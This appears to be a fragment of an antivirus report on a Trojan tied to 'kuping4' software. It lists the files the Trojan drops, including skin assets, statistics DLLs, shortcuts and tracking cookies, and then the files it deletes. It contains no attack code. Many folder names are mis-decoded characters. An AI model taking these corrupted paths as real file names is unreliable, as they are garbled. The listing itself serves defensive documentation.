C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\open.png (784 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\Personal-information\uphead.png (1 bytes)
C:\kuping4\QuickenFunctionConfig\home\HomeConfig.xml (1 bytes)
C:\kuping4\TempDownLoad\Home\Homeversion.ini (31 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\color\yellow.png (298 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\log-bck.png (543 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\danxuan.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\feedback\focus.png (142 bytes)
C:\kuping4\Universal\UniversalMiniSkin\ĬÈÃÂÂ\ui\mini\seach-btn.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\FeedbackDlgConfig\MainFeedbackDlg.ini (879 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\Personal-information\mail.png (263 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\newUi\Screen-saver.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\tag_focus.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\WebContro.ini (529 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\UpdateNotice\logo.png (970 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\function.png (392 bytes)
C:\kuping4\softset.ini (2129 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\install_icon.png (971 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\focus.png (199 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\login\ui\drop-down.png (338 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\add-app-bg_01.png (974 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\login\ui\sina_logo.png (638 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\app.png (987 bytes)
C:\kuping4\TempDownLoad\TagInfo\TagVersion.ini (29 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\MainSkin.ini (3 bytes)
C:\kuping4\Uninstall\skinConfig_un\skinconfig.ini (85 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\daohang\album.png (392 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\daohang\My-collection.png (392 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\begin.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\Personal-information\title-Modify-head.png (3 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\color\gray.png (313 bytes)
C:\kuping4\QuickenFunctionConfig\deskIco\status.ini (16 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\img_01.png (588 bytes)
C:\kuping4\Appsoftconfig\image\play.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\application\iconlist_bg.png (3 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\Personal-information\head120.png (1372 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\silder-fill.png (343 bytes)
C:\kuping4\Update\soft.ini (908 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\DownloadWebDlg\set-cancel.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\logo.png (392 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IconListEx\icon_focus.png (510 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\bg-1.png (794 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KP_7D\skinconfig\ĬÈÃÂÂ\ui\msgbox\btn_known.png (3 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\bg.png (392 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\Personal-information\tailorBg.jpg (1764 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\cheak.png (564 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\logo.png (970 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\update.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\color\orange.png (327 bytes)
C:\kuping4\skinConfig\skinversion.ini (29 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\shuyeer.png (196 bytes)
C:\kuping4\Appsoftconfig\image\buttoncoculation.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ScreenSaverNavigation_Layer.ini (196 bytes)
C:\kuping4\Appsoftconfig\image\soft.xml (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\set_icon.png (782 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\upon.png (288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KP_7D\skinconfig\TongJICNZZ.dll (65 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\UpdateSkin.ini (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CPIRWXAZ\h[1].js (5 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\ImageLook\bg_wf.png (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\SkinCenter\delete.png (486 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\feedback\popmenu.png (678 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\check-box_focus.png (991 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\daohang\My-share.png (392 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\focus-l.png (222 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\about\about.png (1176 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (170 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\m.png (3 bytes)
C:\kuping4\MSGBoxSkin\UI\warning.png (3 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\¡Ì.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\page2.png (106 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\sure.png (634 bytes)
C:\kuping4\UserBehaviorStatistics.dll (471 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\My-resources\list_theme.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\tooltipUi\logo.png (584 bytes)
C:\kuping4\kp4_Mini.exe (157 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\AllApplication_Layer.ini (1 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\input.png (212 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\Label-input-box1.png (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\continue.png (382 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\delete.png (486 bytes)
C:\kuping4\uninstall.exe (2145 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IconListEx\add-m.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\daohang\recover.png (3 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\SepLine.png (99 bytes)
C:\kuping4\TempDownLoad\Home\11275.jpg_0 (392 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\SkinCenter\skin_bg_01.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\updown.png (280 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\HomePageShow_Layer.ini (3 bytes)
C:\kuping4\Appsoftconfig\APPversion.ini (59 bytes)
C:\kuping4\MSGBoxSkin\UI\faild.png (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\ImageLook\refresh.png (1 bytes)
C:\kuping4\Universal\UniversalMiniSkin\ĬÈÃÂÂ\ui\mini\seach.png (1 bytes)
C:\kuping4\Update\SkinResource\Exit.png (1 bytes)
C:\kuping4\Appsoftconfig\image\buttonplay.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\UpdateCheckPage.ini (261 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\login\ui\loading2.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\UpdateInfoPage.ini (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\CenterDlgConfig\MyBaoku.ini (3 bytes)
C:\kuping4\DeskTopPop.exe (1529 bytes)
C:\kuping4\Appsoftconfig\image\sou.png (196 bytes)
C:\kuping4\Update\SkinResource\IsNew.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\newUi\Boot-screen.png (196 bytes)
C:\kuping4\Universal\UniversalMiniSkin\ĬÈÃÂÂ\ui\mini\close.png (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\DownloadWebDlg\scroll.png (410 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\mennu-bg.png (363 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\blue.png (90 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\min.png (338 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\tooltipUi\cancel.png (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\collection.png (3 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\feedback\set.png (234 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\nextpage.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\BootScreenNavigation_Layer.ini (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\color\brown.png (286 bytes)
C:\kuping4\Update\SkinResource\BKStep1.png (902 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\newUi\icon.png (392 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz.mmstat[1].txt (205 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\SettingMenuDlgConfig\MainMenuDlgSkin.ini (2 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\¿áÆÃÂÂ4\öÃâ€ÂØ¿áÆÃÂÂ4.lnk (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\progress\progress.png (179 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\Personal-information\save.png (3 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\SystemThemeNavigation_Layer.ini (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\color\pink.png (290 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\newUi\wallpaper.png (196 bytes)
C:\kuping4\MSGBoxSkin\UI\error.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMZG52N\21[1].gif (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\doc_plus_icon&16.png (264 bytes)
C:\kuping4\unrar.dll (824 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\down.png (161 bytes)
C:\kuping4\Update\SkinResource\ProgressBar.png (984 bytes)
C:\kuping4\QuickenFunctionConfig\deskIco\DeskIconConfig.xml (8 bytes)
C:\kuping4\KPMsgBoxDll.dll (2694 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\feedback_icon.png (392 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\Silence-set_button.png (1 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\finish2.png (588 bytes)
C:\kuping4\Universal\UniversalMiniSkin\ĬÈÃÂÂ\ui\mini\small.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\focus-2.png (200 bytes)
C:\kuping4\TempDownLoad\Home\11274.jpg (392 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\delete-button.png (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\CenterDlgConfig\WebPage.ini (594 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\list-bg.png (96 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\mouse.png (549 bytes)
C:\kuping4\skinConfig\skinconfig.ini (84 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\Download-set.png (966 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\Multi.png (998 bytes)
C:\kuping4\login.dll (2185 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\right_bg.png (194 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\Application-Settings.png (953 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\My-share\bg.png (196 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\¿áÆÃÂÂ4.lnk (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\line_h.png (92 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\WebContrl_Layer.ini (775 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ImageLookDlgConfig\MainSkin.ini (129 bytes)
C:\kuping4\TongJICNZZ.dll (1333 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\application.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\scroll_down.png (982 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\color\black.png (316 bytes)
%Documents and Settings%\%current user%\Desktop\¿áÆÃÂÂ4.lnk (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\start.png (941 bytes)
C:\kuping4\dgmon.dll (471 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\login\ui\Input-box.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\view-bg.png (509 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\ImageLook\fail.png (196 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\lijiuninstall.png (784 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Screening-bg2.png (102 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\UpdateNotice\Alert.png (1 bytes)
C:\kuping4\Appsoftconfig\image\Iebuttonlogo.png (196 bytes)
C:\kuping4\TempDownLoad\Home\home.xml (1764 bytes)
C:\kuping4\livability.dll (510 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9LJNTUH\tongji_baidu[1].htm (295 bytes)
C:\kuping4\Update\SkinResource\Fnish.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\fail.png (3 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\login\WebContro.ini (617 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\show.png (413 bytes)
C:\kuping4\Kp_BootClr.exe (1137 bytes)
C:\kuping4\Repairer.exe (549 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\re.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\UpdateNormal.ini (641 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\backpage.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\color\white.png (283 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KP_7D\skinconfig\ĬÈÃÂÂ\ui\msgbox\bg_small.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\set_1.png (522 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\kupingbg-03_03.png (980 bytes)
C:\kuping4\Appsoftconfig\image\cmd.png (196 bytes)
C:\kuping4\Update\SkinResource\Point.png (1 bytes)
C:\kuping4\BootStart.dll (157 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\cancel.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\add-app-bg_03.png (412 bytes)
C:\kuping4\Universal\UniversalMiniSkin\ĬÈÃÂÂ\ui\mini\logo.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\about\delete.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\notice\Alert.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\App-manager.png (654 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\display_shadow.png (115 bytes)
C:\kuping4\Universal\UniversalCpaSkin.rar (1098 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\app-button.png (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\content.png (416 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\delete.png (486 bytes)
C:\kuping4\MSGBoxSkin\UI\infomation.png (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\mennu-bg2.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CPIRWXAZ\stat[1].php (770 bytes)
C:\kuping4\Appsoftconfig\image\coculation.png (196 bytes)
%Documents and Settings%\%current user%\UserData\YJM90VAL\img.wallba[1].xml (266 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\tooltipUi\cut_button-hand.png (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\Personal-information\headbg.png (556 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\DownloadWebImageDlg\MainSkin.ini (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\daohang\My-resources.png (392 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\about.png (606 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\dan_xuan.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\bg_vein.png (268 bytes)
C:\kuping4\Appsoftconfig\button.xml (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\LocTween_Layer.ini (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\login-btn.png (2 bytes)
C:\kuping4\Update\SkinResource\Cancel.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateNoticeDlg.ini (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\SkinCenter\scroll_thumb.png (842 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Internet Explorer\MSIMGSIZ.DAT (8 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz[1].txt (165 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\SeverTween_Layer.ini (1 bytes)
C:\kuping4\Update\SkinResource\BKStep2.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\screen.png (314 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMZG52N\h[2].js (12 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\tip.png (591 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\set.png (549 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\notchoose.png (879 bytes)
C:\kuping4\version.ini (44 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\color\red.png (318 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\scroll_up.png (927 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\Personal-information\head60.png (392 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\up.png (160 bytes)
C:\kuping4\SystemConfig\LocWallpaleXml.xml (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\Software-update.png (998 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\ImageLook\loading.png (3 bytes)
C:\kuping4\Update\UpData.dll (2342 bytes)
C:\kuping4\Update\SkinResource\Update.png (196 bytes)
C:\kuping4\QuickenFunctionConfig\Setup\CpaConfig.xml (8 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\newUi\local.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\SkinCenter\scroll_block.png (763 bytes)
C:\kuping4\IndividualCenter.dll (5389 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\list-bg2.png (2 bytes)
C:\kuping4\SkinCenter.dll (3635 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\daohang\myDownLoad.png (392 bytes)
C:\kuping4\Kpclick.ini (187 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ResourceNavigation_Layer.ini (974 bytes)
C:\kuping4\MSGBoxSkin\UI\yes_button.png (1 bytes)
C:\kuping4\Appsoftconfig\softtempfile\soft.xml (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IconListEx\iconlist_bg.png (314 bytes)
C:\kuping4\Appsoftconfig\image\buttonsou.png (196 bytes)
C:\kuping4\skinConfig\SkinSetting.xml (1 bytes)
C:\kuping4\MSGBoxSkin\UI\question.png (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\UpdateNotice\bkimg.png (429 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\Directory-box_bg.png (397 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KP_7D\skinconfig\installedSoftInfo.ini (1952 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\bg-4.png (287 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\feedback\submit.png (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\81AVK52J\core[1].php (799 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\check-box.png (540 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\flowerpot.png (3 bytes)
C:\kuping4\Update\info.ini (18 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\doc_empty_icon&16.png (293 bytes)
C:\kuping4\Update\UDStatictical.dll (1882 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\choose.png (883 bytes)
C:\kuping4\TempDownLoad\TagInfo\list_xp.xml (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\finish-button.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\SettingMenuDlgConfig\ConventionalMenu_Layer.ini (1 bytes)
C:\kuping4\KPConfig.inf (3 bytes)
C:\kuping4\Uninstall\installedSoftInfo.ini (984 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\kupingbg-02.png (588 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\Personal-information\share.png (472 bytes)
C:\kuping4\TempDownLoad\Home\11277.jpg (196 bytes)
C:\kuping4\SystemConfig\LocThemeXml.xml (416 bytes)
C:\kuping4\ThemeInstall.dll (863 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Screening-bg.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\caption-bg.png (417 bytes)
C:\kuping4\MSGBoxSkin\UI\bg_top.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\cheakskin\MainSkin.ini (1 bytes)
C:\kuping4\MSGBoxSkin\UI\cancel-button.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\refresh.png (726 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\suspend.png (504 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\tempfile.tmp (184 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\apple.png (3 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\DesktopWallpaperNavigation_Layer.ini (196 bytes)
C:\kuping4\Update\SkinResource\PopupBox.png (392 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\tag.png (195 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\login\ui\kankan.png (1725 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\feedback\delete.png (486 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\NoLogin_Layer.ini (941 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\My-resources\use.png (196 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\bg_01.png (392 bytes)
C:\kuping4\TempDownLoad\SearchBuff.ini (23 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\tag-bg.png (350 bytes)
C:\kuping4\MSGBoxSkin\UI\no_button.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\color\purple.png (325 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\progress_frame.png (3 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\login\ui\failure.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CPIRWXAZ\h[2].js (12 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\SettingMenuDlgConfig\DownLoadMenu_Layer.ini (3 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\min.png (338 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\xiezai.png (375 bytes)
C:\kuping4\TempDownLoad\Home\11278.jpg (588 bytes)
C:\kuping4\Update\SkinResource\Ok.png (196 bytes)
C:\kuping4\Update\SkinResource\FnishSmall.png (2 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\mennu_narrow.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\progress\icon_focus.png (317 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\skin.png (629 bytes)
C:\kuping4\Update\Skin.ini (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\jindutiao1.png (99 bytes)
C:\kuping4\ExpandPackCheck.exe (1725 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\add-app-bg.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\icon.png (1764 bytes)
C:\kuping4\MSGBoxSkin\UI\ok_button.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\focus3.png (357 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\AboutDlgConfig\MainDlg.ini (1 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\KP_7D\skinconfig\TongJICNZZ.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013030120130302 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CPIRWXAZ\h[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KP_7D\skinconfig\ĬÈà(0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KP_7D\skinconfig (0 bytes)
%Documents and Settings%\%current user%\UserData\2Z89WTQV\www.aaa[1].xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KP_7D\skinconfig\ĬÈÃÂÂ\ui\msgbox\cancel.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KP_7D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KP_7D\skinconfig\ĬÈÃÂÂ\MsgBox_1.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMZG52N\h[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KP_7D\skinconfig\installedSoftInfo.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013021120130218 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KP_7D\skinconfig\ĬÈÃÂÂ\ui\msgbox (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KP_7D\skinconfig\ĬÈÃÂÂ\ui\msgbox\bg_small.png (0 bytes)
